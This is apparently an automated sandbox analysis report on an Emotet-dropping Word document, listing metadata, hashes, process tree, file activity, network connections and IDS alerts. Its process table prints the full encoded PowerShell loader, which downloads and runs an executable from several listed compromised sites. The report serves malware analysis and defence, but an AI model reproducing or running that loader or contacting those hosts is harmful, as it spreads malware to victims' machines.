File name: | Archivo_18-09-2019 940233.doc |
Full analysis: | https://app.any.run/tasks/3fa75e33-a920-468f-bf5a-0e542d37b7e8 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | September 18, 2019, 16:42:37 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Vision-oriented Technician bypass, Subject: teal, Author: Ludwig Connelly, Comments: Factors, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Sep 18 15:38:00 2019, Last Saved Time/Date: Wed Sep 18 15:38:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0 |
MD5: | BBB6CA9833AC1EAFA81E3864748EB52B |
SHA1: | 5FE0016FD99F83150FB574B864C281FA405E456B |
SHA256: | E22A9596F5F82E75FEB46AB5C8690F25842FE03D03AA9CCE41E9D8BA301268FE |
SSDEEP: | 6144:TzyxNRIIt1POT3XtwNJ6mdZPLkIZ7NSU4jJntATfDWGPy4XSKe:TzyxNRIIt1POT3XtwNJ6mdpXZ7NSU4V/ |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
Manager: | Medhurst |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 641 |
Paragraphs: | 1 |
Lines: | 4 |
Company: | Mraz, Nader and Feil |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 547 |
Words: | 95 |
Pages: | 1 |
ModifyDate: | 2019:09:18 14:38:00 |
CreateDate: | 2019:09:18 14:38:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | Factors |
Keywords: | - |
Author: | Ludwig Connelly |
Subject: | teal |
Title: | Vision-oriented Technician bypass |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2856 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Archivo_18-09-2019 940233.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3964 | powershell -encod JAB6AEcASgA0AG4ASgA9ACcAbAB2ADMAdwBLADkAMQA3ACcAOwAkAEwASgB1AEYAcgAzACAAPQAgACcAOAAzADUAJwA7ACQAVQBQAEsAcgB3AGEAUAA9ACcAcQBiAG8AYwBPAFMAQwAnADsAJAByAHIANQBLAFIAdQB3ADEAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEwASgB1AEYAcgAzACsAJwAuAGUAeABlACcAOwAkAHoARQB1AEQAaQBCAEIAMAA9ACcATgBVAHoAUABvAGIAQgBCACcAOwAkAFgAdABfAE0AdwBxAD0AJgAoACcAbgBlAHcAJwArACcALQBvAGIAagAnACsAJwBlAGMAdAAnACkAIABOAEUAdAAuAHcARQBiAGMATABJAGUATgB0ADsAJABkAGoANgBkAG0AcgA9ACcAaAB0AHQAcAA6AC8ALwB0AGgAaQBuAGgAdgB1AG8AbgBnAG0AZQBkAGkAYQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AbgAyAGsAZQBlAHAANwAvAEAAaAB0AHQAcABzADoALwAvAG0AbgBwAGEAcwBhAGwAdQBiAG8AbgBnAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBuAHMAbQB6ADkAYQB6ADAAMwAyAC8AQABoAHQAdABwADoALwAvAHQAcgB1AG4AZwBhAG4AaAAuAHgAeQB6AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHUAegBxADUAMAAvAEAAaAB0AHQAcABzADoALwAvAGkAcAB0AGkAdgBpAGMAaQBuAGkALgBjAG8AbQAvAG4AcABrAHgALwBqAHcAcAB5ADkAMwA4AC8AQABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBjAGUAegBhAGUAdgBpAG4AZQBnAG8AbgBkAGUAcgAuAGMAbwBtAC8AYwBvAG4AZgAvAGYAZAA0ADUALwAnAC4AIgBTAHAAbABgAEkAVAAiACgAJwBAACcAKQA7ACQAVABkAFgAbgBpADAAUgA9ACcAZAA0ADcAaQBNADQAMAAnADsAZgBvAHIAZQBhAGMAaAAoACQAbwBqAGoAVQBUAG8AagBCACAAaQBuACAAJABkAGoANgBkAG0AcgApAHsAdAByAHkAewAkAFgAdABfAE0AdwBxAC4AIgBkAG8AdwBOAEwAYABPAEEAYABEAGYAYABpAEwARQAiACgAJABvAGoAagBVAFQAbwBqAEIALAAgACQAcgByADUASwBSAHUAdwAxACkAOwAkAG4ASgBxAHcAOABYAFEAPQAnAEoAQQBBAE4AUQBPADMAVwAnADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAJwArACcAbQAnACkAIAAkAHIAcgA1AEsAUgB1AHcAMQApAC4AIgBMAGUAbgBHAGAAVABoACIAIAAtAGcAZQAgADIAOQA4ADAANAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAHIAVAAiACgAJAByAHIANQBLAFIAdQB3ADEAKQA7ACQAZABmAHYANQBqADUAPQAnAG8AbgBYAHAAdgBxACcAOwBiAHIAZQBhAGsAOwAkAGwAagBqAEEAWABMADAAPQAnAFUAVwBtAHIAcgAxACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGkAdwBRAFkAdwBQAD0AJwB3AGgAWAB6AFYAUABpACcA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3396 | "C:\Users\admin\835.exe" | C:\Users\admin\835.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2664 | "C:\Users\admin\835.exe" | C:\Users\admin\835.exe | — | 835.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2768 | --f0e46278 | C:\Users\admin\835.exe | — | 835.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3576 | --f0e46278 | C:\Users\admin\835.exe | 835.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3104 | "C:\Users\admin\AppData\Local\easywindow\easywindow.exe" | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | — | 835.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
552 | "C:\Users\admin\AppData\Local\easywindow\easywindow.exe" | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | — | easywindow.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
924 | --fd47f3b8 | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | — | easywindow.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2664 | --fd47f3b8 | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | easywindow.exe | |
User: admin Integrity Level: MEDIUM |
PID | Process | Filename | Type | |
---|---|---|---|---|
2856 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9EF4.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2856 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:CD0929FDC6545C244CB285B22558DE27 | SHA256:4F0C83A3FE87834B4FE11EE04E1367F736F25C3034A92327199430EDC9366CAD | |||
2856 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:0D64A4AEAC6572AC3FB0EE47E94EB2EA | SHA256:11D5A9C0B3EFD2FAE601D8223F5976B4ADCFF1EAFFBADBAD07C7430313A5D47E | |||
2856 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9DDDFCDB.wmf | wmf | |
MD5:4F9623B6E4D73C98B6EE1D305B894DF0 | SHA256:E01D16C354DA14EF703AC03757CA38E974A5AA6A89D36D8F4FD9A03C2D05FFF5 | |||
2856 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A67B968F.wmf | wmf | |
MD5:9F1F3445CDA70314899C48D0E3D4CC30 | SHA256:D30851ED755944F401E0EC7D0D8B2E725A8011CB20B2D9F7E71015FCC800AC9A | |||
2856 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\74D97C2E.wmf | wmf | |
MD5:3AFACB6E50189306E743E775F890B26D | SHA256:2003EE0D9506E43CF74933274F3ADD06EC574E474101EC38E94C4ED6242852A7 | |||
2856 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C80D1D4B.wmf | wmf | |
MD5:BE149EF4A7E4875DEC9B4B8A8E52D0B0 | SHA256:1CE8F318DCD9AEE95851428924D17C982219B3BD2EB9CE0DAC1C93076BDDBF97 | |||
2856 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$chivo_18-09-2019 940233.doc | pgc | |
MD5:D235637F3BA57EADAD93191138586BDE | SHA256:4CDC9EFA3B002D0CE1422A88609DDC7762A30609F7DCEFC825657D65155312EF | |||
2856 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\73DED57D.wmf | wmf | |
MD5:5C4F83E134A72503FCF81E7E63F4F4AD | SHA256:E6B63B63938C82998B52AB441245F483F24AF2CAE8C6CC60DBF4A5E8CB491F7D | |||
2856 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\985CE86C.wmf | wmf | |
MD5:38DB4ACEB80EDB705160C20F778708A3 | SHA256:F9660711F6A14A1CC7E1B6B8B377FFEC36E9C9F9C79B0EB70356987CCF642944 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3964 | powershell.exe | GET | 200 | 124.158.6.218:80 | http://thinhvuongmedia.com/wp-admin/n2keep7/ | VN | executable | 400 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3964 | powershell.exe | 124.158.6.218:80 | thinhvuongmedia.com | CMC Telecommunications Services Company | VN | suspicious |
2664 | easywindow.exe | 189.129.4.186:80 | — | Uninet S.A. de C.V. | MX | malicious |
Domain | IP | Reputation |
---|---|---|
thinhvuongmedia.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
3964 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3964 | powershell.exe | A Network Trojan was detected | AV INFO Suspicious EXE download from WordPress folder |
3964 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3964 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2664 | easywindow.exe | A Network Trojan was detected | AV TROJAN W32/Emotet CnC Checkin (Apr 2019) |
2664 | easywindow.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |